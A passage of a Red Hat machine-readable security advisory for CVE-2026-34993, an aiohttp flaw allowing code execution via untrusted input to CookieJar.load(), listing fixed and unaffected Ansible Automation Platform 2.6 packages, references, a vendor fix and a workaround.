"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484099"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in AIOHTTP, an asynchronous HTTP client/server framework for asyncio and Python. An attacker could exploit this vulnerability by providing untrusted input to the `CookieJar.load()` function. This could potentially lead to arbitrary code execution, allowing the attacker to run malicious code on the affected system. This issue is most likely to occur in applications that allow attacker-controlled files to be loaded.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in AIOHTTP, a Python asynchronous HTTP framework, due to potential arbitrary code execution. The vulnerability arises when applications load untrusted input into the `CookieJar.load()` function. Exploitation requires an application to be configured to process attacker-controlled files, which is not a default or common scenario in most Red Hat product deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-34993"
},
{
"category": "external",
"summary": "RHBZ#2484099",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484099"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-34993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34993"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00",
"url": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8"
}
],
"release_date": "2026-06-02T18:29:15.847000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "workaround",
"details": "Applications using AIOHTTP that are configured to load untrusted files via the `CookieJar.load()` function should implement input sanitization prior to loading. This prevents the injection of malicious code.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
